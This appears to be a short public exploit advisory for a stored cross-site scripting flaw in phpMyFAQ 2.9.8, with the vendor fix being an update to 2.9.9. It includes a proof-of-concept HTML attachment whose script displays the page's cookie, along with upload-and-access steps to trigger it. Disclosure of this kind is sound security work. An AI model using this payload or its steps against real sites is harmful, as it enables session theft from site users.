# Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vulnerability # Date: 28-9-2017# Exploit Author: Nikhil Mittal (Payatu Labs)# Vendor Homepage: http://www.phpmyfaq.de/# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip # Version: 2.9.8# Tested on: MAC OS# CVE : 2017-157271. Description
In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment.2. Proof of concept
Exploit code
<!DOCTYPE html><html><head><title>XSS EXPLOIT</title></head><body><script>confirm(document.cookie)</script></body></html>
Steps to reproduce:1. Create a user having limited access rights to attachment section
2. Goto http://localhost/phpmyfaq/admin/?action=editentry
2. Upload the exploit code with.html extension at the place of attachements
3. Access the file url generated at /phpmyfaq/attachments/<random_path>4. Reach to last file using directory traversal and XSS will triage
3. Solution
Update to phpMyFAQ Version 2.9.9
http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip
